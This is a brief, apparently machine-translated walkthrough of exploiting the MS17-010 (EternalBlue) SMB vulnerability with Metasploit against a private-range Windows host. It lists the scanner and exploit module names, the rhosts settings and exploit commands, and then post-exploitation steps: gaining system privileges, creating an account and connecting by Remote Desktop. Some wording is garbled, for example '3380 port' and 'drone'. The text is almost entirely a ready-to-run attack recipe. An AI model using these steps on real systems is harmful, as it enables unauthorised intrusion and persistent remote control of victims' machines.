1 , open postgresql database
2 , msfconsole enter MSF in
3 , Search 17-010 search cve17-010 related exp
auxiliary / scanner / smb / smb_ms17_010 scanning the existence of loopholes
exploit / windows / smb / ms17_010_eternalblue to attack exp
4 , to detect whether there are loopholes
use auxiliary/scanner/smb/smb_ms17_010
5, set rhosts 192.168.121.146 specified host needs to be set
exploit to run after the setup is complete
6, attack
use exploit / windows / smb / ms17_010_eternalblue into the attack module
set rhosts 192.168.121.146 designated attack ip
exploit run
7, here we have a successful attack, directly target system privileges
8, and then create an account - open the 3380 port --rdesktop drone drone IP using Remote Desktop Connection - the connection is completed